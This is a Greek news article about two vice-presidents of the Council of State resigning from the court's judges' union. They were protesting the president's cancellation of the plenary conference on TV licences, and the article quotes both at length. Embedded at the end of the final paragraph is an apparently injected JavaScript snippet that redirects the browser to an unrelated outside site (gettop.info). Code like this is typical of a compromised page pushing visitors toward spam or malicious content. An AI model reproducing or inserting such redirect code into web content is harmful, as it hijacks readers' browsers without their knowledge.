«Κεραυνός» 2 αντιπροέδρων του ΣτΕ -Παραιτήθηκαν από την Ένωση δικαστών

0
9

 

Ανατροπές στο Συμβούλιο Επικρατείας μετά την απόφαση του προέδρου του Νίκου Σακελλαρίου να ματαιώσει την πρώτη κρίσιμη διάσκεψη για τις τηλεοπτικές άδειες, επικακούμενος το κλίμα που είχε διαμορφωθεί το τελευταίο διάστημα.

Δυο αντιπρόεδροι του ανωτάτου δικαστηρίου ανακοίνωσαν την παραίτησή τους από την Ένωσης Δικαστών του ΣτΕ, διαφωνώντας και με τον λόγο που επικαλέστηκε ο κ. Σακελλαρίου για να ματαιώσει τη συνεδρίαση της Ολομέλειας, καθώς επίσης και με την ανακοίνωση της Ένωσης Δικαστών, η οποία στήριζε την απόφασή του.

Οι δύο αντιπρόεδροι Χρήστος Ράμμος και Αικατερίνη Σακελλαροπούλου σημειώνουν με νόημα ότι η ματαίωση της επίμαχης διάσκεψης αποτελεί «αρνησιδικία», ενώ χαρακτηρίζουν μέγα ατόπημα την ανακοίνωση της Ένωσης του ΣτΕ, η οποία έδωσε την εντύπωση ότι λειτουργεί ως γραφείο Τύπου του προέδρου.

Ο κ. Ράμμος, τονίζει ότι  «είναι πρωτοφανής η άποψη πως το Δικαστήριο ή ο κάθε δικαστής, στα πλαίσια των δικών του αρμοδιοτήτων μπορεί να παραιτηθεί και να απέχει έστω και προσωρινά, αλλά πάντως επ΄ αόριστον, από την επιτέλεση του θεσμικού συνταγματικού του καθήκοντος, που δεν είναι άλλο από το να τέμνει αδιατάρακτο τις ενώπιον του αγόμενες διαφορές έτσι ώστε να επιλύονται οι αμφισβητήσεις που διαπερνούν την κοινωνία με την αυθεντία της δικαστικής λειτουργίας όταν έχει αναπτυχθεί – και μάλιστα εκτός δικαστηρίου – κλίμα έντασης . Η άποψη με άλλα λόγια, που δέχεται ότι το Δικαστήριο αντί να διασκεφθεί και να εκδώσει απόφαση επί οποιασδήποτε υποθέσεως, ανεξαρτήτως της φύσεώς της, είναι σκόπιμο να αναβάλει επ΄ αόριστον τη διάσκεψή του με την επίκληση ενός κάποιου κλίματος ( το οποίο βεβαίως το Δικαστήριο δεν μπορεί να ελέγξει) συνιστά κατά τη γνώμη μου αρνησιδικία«.

Και διερωτάται κλείνοντας ο κ. Ράμμος: «Μπορεί κανείς να διανοηθεί το 1969 αναβολή είτε της συζήτησης είτε της διάσκεψης επί της υποθέσεως των απολυμένων από τη στρατιωτική δικτατορία δικαστών κατ΄ επίκληση «δυσμενών συνθηκών» η «κακού κλίματος»;

Αλλά και η αντιπρόεδρος Αικατερίνη Σακελλαροπούλου -που έχει διατελέσει επί χρόνια και πρόεδρος της Ενώσεως των Δικαστών του Συμβουλίου της Επικρατείας- στηλιτεύει την επίκληση λόγων «κλίματος» για τη ματαίωση της διάσκεψης της Ολομέλειας για τις τηλεοπτικές άδειες.

Η κυρία Σακελλαροπούλου τονίζει μεταξύ άλλων πως «με την ανακοίνωση της Ενώσεως που αποδοκιμάζει τα «όσα αντίθετα αναφέρονται στον Τύπο», με βάση όχι τη δική του αντίληψη για τα πράγματα αλλά την ανακοίνωση του Προέδρου του Δικαστηρίου μετατρέποντας ουσιαστικά την Ένωση, για πρώτη φορά, κατά την αντίληψή μου σε γραφείο τύπου του Προέδρου του Δικαστηρίου».

«Το συγκεκριμένο ατόπημα», συνεχίζει η κυρία Σακελλαροπούλου, «πλήττει καίρια τον θεσμικό ρόλο της Ενώσεως και σηματοδοτεί αλλαγή στη μακρόχρονη πορεία της, από ανεξάρτητο όργανο έκφρασης γνώμης του συνόλου των μελών του Δικαστηρίου, σε διοικητική υπηρεσία».

Μετά τις επιστολές παραίτησης των δύο αντιπροέδρων από την Ένωση του ΣτΕ συγκαλείται εκτάκτως στις 13 Οκτωβρίου γενική συνέλευση των μελών του Δικαστηρίου για να συζητηθούν τα θέματα που έχουν προκύψει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here